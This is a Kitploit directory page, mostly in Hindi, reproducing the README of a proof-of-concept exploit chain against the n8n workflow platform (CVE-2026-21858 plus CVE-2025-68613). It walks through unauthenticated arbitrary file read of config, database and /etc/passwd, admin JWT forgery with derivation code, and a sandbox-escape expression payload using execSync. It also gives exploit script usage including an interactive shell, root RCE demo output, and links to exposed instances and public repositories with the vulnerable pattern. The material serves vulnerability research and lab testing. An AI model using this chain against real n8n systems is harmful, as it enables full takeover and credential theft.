Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-21858 — CVE-2026-21858 के लिए POC | Kitploit
उपकरण/GitHubGitHub/fomovet/cve-2026-21858
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubfomovet/cve-2026-21858

cve-2026-21858

CVE-2026-21858 के लिए POC

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-21858 + CVE-2025-68613 - n8n पूर्ण श्रृंखला

बिना प्रमाणीकरण के आर्बिट्ररी फ़ाइल रीड → एडमिन टोकन फोर्ज → सैंडबॉक्स बाईपास → RCE

CVECVE-2026-21858 (AFR) + CVE-2025-68613 (RCE)
CVSS10.0 + 9.9 (गंभीर)
प्रभावित<= 1.65.0 (AFR) / >= 0.211.0 (RCE)
ठीक किया गया1.121.0 (AFR) / 1.120.4+ (RCE)
खुलासा2026-01-07 11:09 UTC
कोडनेमNi8mare
श्रेयDor Attias (Cyera)
एक्सप्लॉइटChocapikk
प्रक्रियाAI-स्वचालित: पैच डिफ़ → रीप्रो → लैब → एक्सप्लॉइट (प्रकटीकरण के ~9 घंटे बाद)
प्रकारप्रूफ ऑफ कॉन्सेप्ट - यह एक सार्वभौमिक एक्सप्लॉइट नहीं है (विशिष्ट वर्कफ़्लो कॉन्फ़िगरेशन की आवश्यकता है, सीमाएँ देखें)

TL;DR

n8n पर पूर्ण बिना-प्रमाणीकरण RCE श्रृंखला:

  1. CVE-2026-21858 - Content-Type भ्रम → आर्बिट्ररी फ़ाइल रीड
  2. कॉन्फ़िग + डेटाबेस पढ़ें → एडमिन JWT फोर्ज करें
  3. CVE-2025-68613 - एक्सप्रेशन इंजेक्शन → सैंडबॉक्स बाईपास → RCE

पता लगाना

एक्सपोज़र संस्करण-आधारित है। एक्सपोज़र के संदर्भ में, ऐसे असुरक्षित n8n इंस्टेंस सार्वजनिक रूप से सुलभ हैं।

LeakIX परिणाम: एक्सपोज़्ड इंस्टेंस देखें

LeakIX डिटेक्शन परिणाम

यह एक्सप्लॉइट क्यों?

यह एक्सप्लॉइट Cyera राइट-अप से स्वतंत्र रूप से विकसित किया गया था (पूरा होने के बाद खोजा गया)। मुख्य अंतर:

दोनों दृष्टिकोणों के लिए विशिष्ट वर्कफ़्लो कॉन्फ़िगरेशन की आवश्यकता होती है। Cyera को चैट + AI एकीकरण चाहिए, इस एक्सप्लॉइट को Respond नोड वाले फ़ॉर्म की आवश्यकता होती है। विवरण के लिए सीमाएँ देखें।

हमले की श्रृंखला

root@kitploit:~
┌───────────────────────────────────────────────────────────┐
│                     UNAUTHENTICATED                       │
├───────────────────────────────────────────────────────────┤
│  1. Read /proc/self/environ → Find HOME directory         │
│  2. Read $HOME/.n8n/config → Get encryptionKey            │
│  3. Read $HOME/.n8n/database.sqlite → Get admin creds     │
├───────────────────────────────────────────────────────────┤
│                      TOKEN FORGE                          │
├───────────────────────────────────────────────────────────┤
│  4. Derive JWT secret from encryptionKey                  │
│  5. Forge admin session cookie                            │
├───────────────────────────────────────────────────────────┤
│                    AUTHENTICATED RCE                      │
├───────────────────────────────────────────────────────────┤
│  6. Create workflow with expression injection             │
│  7. Sandbox bypass via this.process.mainModule.require    │
│  8. Execute arbitrary commands                            │
└───────────────────────────────────────────────────────────┘

CVE-2026-21858 - Content-Type भ्रम के माध्यम से आर्बिट्ररी फ़ाइल रीड

पैच

root@kitploit:~
commit c8d604d2c466dd84ec24f4f092183d86e43f2518
Author: mfsiega
Date:   Thu Nov 13 11:51:40 2025 +0100

    Merge commit from fork

पौराणिक "Merge commit from fork" - जब आप यह देखते हैं, तो किसी ने कुछ तीखा खोज लिया है। 🌶️

मूल कारण

root@kitploit:~
// BEFORE (vulnerable)
const files = (context.getBodyData().files as IDataObject) ?? {};
await context.nodeHelpers.copyBinaryFile(file.filepath, ...)

// AFTER (fixed)
a.ok(req.contentType === 'multipart/form-data', 'Expected multipart/form-data');

Content-Type: application/json भेजें → filepath को नियंत्रित करें → कोई भी फ़ाइल पढ़ें।

CVE-2025-68613 - एक्सप्रेशन इंजेक्शन RCE

यह बाईपास क्यों?

n8n उपयोगकर्ता कोड (Code Node, एक्सप्रेशन) को vm2/isolated-vm का उपयोग करके सैंडबॉक्स करता है। अन्य RCE वेक्टर:

तकनीकस्थिति
Execute Command Nodeडिफ़ॉल्ट रूप से अक्षम (N8N_ALLOW_EXEC_COMMAND=false)

मैंने एक्सप्रेशन इंजेक्शन का उपयोग किया क्योंकि यह डिफ़ॉल्ट सेटिंग्स के साथ किसी भी n8n पर काम करता है - किसी विशेष नोड या कॉन्फ़िग की आवश्यकता नहीं है। Pyodide बाईपास (CVE-2025-68668) के लिए Python Code Node की आवश्यकता होती है, जो सभी इंस्टेंस पर उपलब्ध नहीं हो सकता है।

पेलोड

root@kitploit:~
={{ (function() { 
  var require = this.process.mainModule.require; 
  var execSync = require("child_process").execSync; 
  return execSync("id").toString(); 
})() }}

n8n एक्सप्रेशन के पास this.process.mainModule.require तक पहुँच होती है → पूर्ण सैंडबॉक्स एस्केप।

टोकन फोर्ज

root@kitploit:~
# JWT secret derivation
jwt_secret = sha256(encryption_key[::2]).hexdigest()

# JWT hash
jwt_hash = b64encode(sha256(f"{email}:{password_hash}")).decode()[:10]

# Forge token
token = jwt.encode({"id": user_id, "hash": jwt_hash}, jwt_secret, "HS256")

लैब सेटअप

root@kitploit:~
docker compose up -d
# Wait ~60 seconds for setup
# Form: http://localhost:5678/form/vulnerable-form
# Creds: [email protected] / ExploitLab123!

उपयोग

root@kitploit:~
# Read arbitrary file
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

# Full chain with command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"

# Interactive shell
uv run python exploit.py http://localhost:5678 /form/vulnerable-form

डेमो

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          ║
║     Arbitrary File Read → Token Forge → Sandbox Bypass → RCE  ║
╚═══════════════════════════════════════════════════════════════╝

[*] Target: http://localhost:5678/form/vulnerable-form
[*] Version: 1.65.0 (VULN)
[x] HOME directory
[+] HOME directory: /root
[x] Encryption key
[+] Encryption key: yusrXZV1...
[x] Database
[+] Database: 1327104 bytes
[x] Admin user
[+] Admin user: [email protected]
[x] Token forge
[+] Token forge: OK
[x] Admin access
[+] Admin access: GRANTED!
[+] Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjljMWI5MzU0LTI5NzQtNGZlOS05OTc2LWVmZDM3ZWEyNWFlMiIsImhhc2giOiJGYzVQZjVkUDRxIn0.TrIjHV3_6pw6Syi4qme5larZeQElBJmo4Y_eSgL9_M0
[x] RCE
[+] RCE: OK

uid=0(root) gid=0(root) groups=0(root)

सीमाएँ

यह "किसी भी n8n को pwn करने वाला" एक्सप्लॉइट नहीं है। इसे काम करने के लिए विशिष्ट शर्तों की आवश्यकता होती है:

आवश्यकताविवरण
फ़ाइल अपलोड वाला फ़ॉर्मलक्ष्य में फ़ाइल अपलोड फ़ील्ड वाला एक फ़ॉर्म वर्कफ़्लो होना चाहिए

असुरक्षित वर्कफ़्लो कॉन्फ़िगरेशन का उदाहरण:

root@kitploit:~
{
  "nodes": [
    {
      "name": "Form Trigger",
      "type": "n8n-nodes-base.formTrigger",
      "parameters": {
        "responseMode": "responseNode",
        "formFields": {
          "values": [{ "fieldLabel": "document", "fieldType": "file" }]
        }
      }
    },
    {
      "name": "Respond",
      "type": "n8n-nodes-base.respondToWebhook",
      "parameters": {
        "respondWith": "binary",
        "inputDataFieldName": "document"
      }
    }
  ],
  "connections": {
    "Form Trigger": { "main": [[{ "node": "Respond" }]] }
  }
}

मुख्य तत्व हैं: fieldType: "file" + respondWith: "binary"। यह पैटर्न फ़ाइल प्रोसेसिंग वर्कफ़्लो (कन्वर्टर, इमेज रिसाइज़र, दस्तावेज़ प्रोसेसर) में आम है।

काम करता है:

  • Respond नोड वाले फ़ॉर्म जो बाइनरी लौटाते हैं (फ़ाइल कन्वर्टर, प्रोसेसर)
  • डिफ़ॉल्ट n8n इंस्टॉलेशन (एक्सप्रेशन इंजेक्शन अवरुद्ध नहीं है)
  • लोकल/Docker डिप्लॉयमेंट (डेटाबेस + कॉन्फ़िग डिस्क पर संग्रहीत)

काम नहीं करता:

  • बिना Respond नोड वाले फ़ॉर्म (फ़ाइल पढ़ी जाती है लेकिन सामग्री HTTP रिस्पॉन्स में नहीं लौटाई जाती)
  • प्रमाणीकरण की आवश्यकता वाले फ़ॉर्म
  • n8n Cloud (अलग आर्किटेक्चर, कोई लोकल फ़ाइल एक्सेस नहीं)
  • पैच किए गए संस्करण (>= 1.121.0)

नोट: यह भेद्यता (आर्बिट्ररी फ़ाइल रीड) एक्सफ़िल्ट्रेशन विधि की परवाह किए बिना ट्रिगर होती है। Respond नोड सामग्री प्राप्त करने का केवल एक तरीका है। वैकल्पिक तरीके (OOB, अन्य आउटपुट नोड) वर्कफ़्लो कॉन्फ़िगरेशन के आधार पर काम कर सकते हैं।

ब्लाइंड एक्सप्लॉइटेशन: यदि कोई Respond नोड मौजूद नहीं है, तो फ़ाइल अभी भी n8n द्वारा पढ़ी जाती है, लेकिन HTTP रिस्पॉन्स के माध्यम से एक्सफ़िल्ट्रेट नहीं की जा सकती। वैकल्पिक तकनीकों (OOB, टाइमिंग) की आवश्यकता होगी।

वास्तविक दुनिया के उदाहरण

असुरक्षित पैटर्न (Form Trigger + फ़ाइल अपलोड + Respond to Webhook) सार्वजनिक GitHub रिपॉज़िटरी में मौजूद है।

नोट: लोकप्रिय n8n वर्कफ़्लो रिपॉज़ (>100⭐) इस पैटर्न का उपयोग नहीं करते। ये सामुदायिक/व्यक्तिगत प्रोजेक्ट हैं:

ये समुदाय द्वारा योगदान किए गए वर्कफ़्लो हैं। कोई भी आधिकारिक n8n.io टेम्पलेट इस असुरक्षित पैटर्न का उपयोग नहीं करता।

संदर्भ

  • Vulhub Environment - Vulhub पर उपयोग के लिए तैयार लैब
  • Cyera Research - Ni8mare Full Write-up - Dor Attias द्वारा मूल शोध
  • GHSA-v4pr-fm98-w9pg - CVE-2026-21858
  • GHSA-v98v-ff95-f3cp - CVE-2025-68613
  • Nuclei Template CVE-2025-68613
  • LeakIX Search Results - एक्सपोज़्ड असुरक्षित इंस्टेंस
  • Formidable - "लाइब्रेरी, गाना नहीं" (हँसी के लिए Cyera का धन्यवाद)
टूल डाउनलोड करें
Cyera (मूल शोध)यह एक्सप्लॉइट
फ़ाइल रीडAI नॉलेज बेस में लोड करें → चैट के माध्यम से क्वेरी करेंसीधे HTTP रिस्पॉन्स
पूर्वापेक्षाएँचैट वर्कफ़्लो + AI एकीकरणफ़ाइल अपलोड के साथ कोई भी फ़ॉर्म
RCE विधि"Execute Command" नोड (डिफ़ॉल्ट रूप से अक्षम)एक्सप्रेशन इंजेक्शन (डिफ़ॉल्ट इंस्टॉलेशन पर काम करता है)
स्वचालनमैन्युअल/अवधारणात्मक डेमोपूरी तरह से स्वचालित Python स्क्रिप्ट
SSH/HTTP Nodesरिमोट सर्वर पर निष्पादित होते हैं, n8n होस्ट पर नहीं
Pyodide Sandbox EscapeCVE-2025-68668 - Python Code Node की आवश्यकता है
Expression InjectionCVE-2025-68613 - डिफ़ॉल्ट इंस्टॉलेशन पर काम करता है
Respond to Webhook नोडवर्कफ़्लो को फ़ाइल सामग्री HTTP रिस्पॉन्स में लौटानी होगी
वर्कफ़्लो सक्रियफ़ॉर्म वर्कफ़्लो सक्रिय होना चाहिए
बिना प्रमाणीकरण पहुँचफ़ॉर्म सार्वजनिक रूप से सुलभ होना चाहिए (कोई प्रमाणीकरण नहीं)
Workflow FileFile FieldsrespondWith
ifcpipeline/.../ifcpipeline.jsonIDS, IFC (x2)binary ⚠️
nano-banana-studio/.../03_multi_asset_processor.jsonImages, Audio, Markdownjson
ticket-omnichannel-chat/.../Knowledge_base.jsonDocument(PDF)text
ai_resume_project/resume_rag.jsonFile UploadallIncomingItems
fkgpt-portfolio/.../audio-transcription-analysis.jsonAudio Filetext
n8n-backup/.../K3DwHQs0fnnm5UK0.jsonfiletext
voltixLandingPage/.../chatbotvoltix.jsonUpload Filedefault
n8n-backup-zm/.../Ky1AiuIMbY1zoTLE.jsonfiledefault
8n8Workflows/.../3WoSqiBnZ56RtWMb.jsonUpload your documentdefault
learn_earn_ai_insta/.../My workflow.jsonupload your filedefault
finintworkshop/.../API using n8n (ToT).jsonfilejson